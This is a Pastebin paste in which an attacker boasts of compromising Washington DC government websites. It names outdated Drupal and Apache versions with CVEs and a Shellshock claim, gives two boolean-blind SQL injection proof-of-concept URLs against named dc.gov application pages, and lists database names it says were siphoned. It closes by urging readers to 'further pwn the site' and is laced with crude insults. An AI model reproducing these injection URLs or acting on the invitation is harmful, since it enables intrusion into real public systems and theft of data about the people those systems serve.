SHARE
TWEET

Tale on pwning dc.gov

a guest Sep 29th, 2014 457 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ../Tale_on_Pwning_DC.GOV
  2.  
  3. /bitandcheese
  4.  
  5. ~/dc.gov - or knows as Washington DC webpage - home of the braves - land of the small dick's men_ little knows their brave-page was running outdated Drupal_ but this wasn't just the only thing DC.GOV opens to..._ summary of exploits:_
  6.  
  7. = Running Drupal 7.26
  8. --- http://dc.gov/CHANGELOG.txt
  9. --- CVE-2014-5022 Cross-site scripting (XSS) Ajax
  10. --- CVE-2014-5020
  11. --- CVE-2014-5019 Denial of Sevice
  12. = Outdated Apache version
  13. --- Shellshock RCE
  14. = SQLi at ocp.gov.dc & cfo.dc.gov
  15. --- DBs exposed & injectable
  16. --- MsSQL
  17. --- PoC (Boolean Blind):
  18. http://app.ocp.dc.gov/RUI/information/awards/detail.asp?award_id=4279%27%20AND%20999=999%20AND%20%27AEEs%27=%27AEEs
  19. http://app.cfo.dc.gov/news/release.asp?id=4mon=199911%27%20AND%20999=999%20AND%20%27AEEs%27=%27AEEs
  20.  
  21. ~/which geniuses at DC operate this website?_ it takes less than a monkey to run it_ Here was the siphoned DBs:_
  22.  
  23. cfo
  24. Cgov360
  25. dba
  26. DCOCB
  27. dcphis
  28. dcpshscaprd
  29. DCTaxi
  30. dcwebforms
  31. ddoeiceprd
  32. dhs_ap
  33. dpw
  34. eformDCTaxi
  35. EIMS_ESTAGING
  36. EIMS_LSTAGING
  37. EIMS_Prod
  38. esa_prod
  39. FG9Region
  40. Imagine
  41. ImpactAid_PROD
  42. INFOLINX_DCHR
  43. InformNet
  44. lsdbe_prod
  45. master
  46. model
  47. msdb
  48. nclb
  49. ocp
  50. opgd
  51. perb
  52. PreNCLB
  53. redfive
  54. RightToKnowHQ
  55. RiskOrientedThinking
  56. serve
  57. survey2
  58. tdms
  59. tempdb
  60.  
  61. ~/feel free to further pwn the site!_ shit sites get pwned - i dont care what gov u r_
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top